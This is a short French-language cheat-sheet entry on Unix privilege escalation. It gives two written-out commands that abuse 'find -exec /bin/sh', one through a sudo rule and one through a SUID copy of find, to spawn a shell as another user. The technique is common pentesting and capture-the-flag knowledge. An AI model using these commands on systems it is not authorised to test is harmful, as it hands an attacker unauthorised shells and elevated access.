Elevation de Privilege - Unix

Il est possible d'utiliser la commande -exec de find pour ouvrir un shell.
On recherche n'importe quel fichier, et c'est un prétexte pour lancer la commande /bin/sh.
Ici avec un sudo, le shell sera ouvert en tant que user2:

sudo -u user /usr/bin/find . -name readme.txt -exec /bin/sh \;

Si on trouve la commande find, copiée dans un répertoire avec le SUID bit actif, on l'exploite de la même façon:

./find . -name readme.txt -exec /bin/sh \;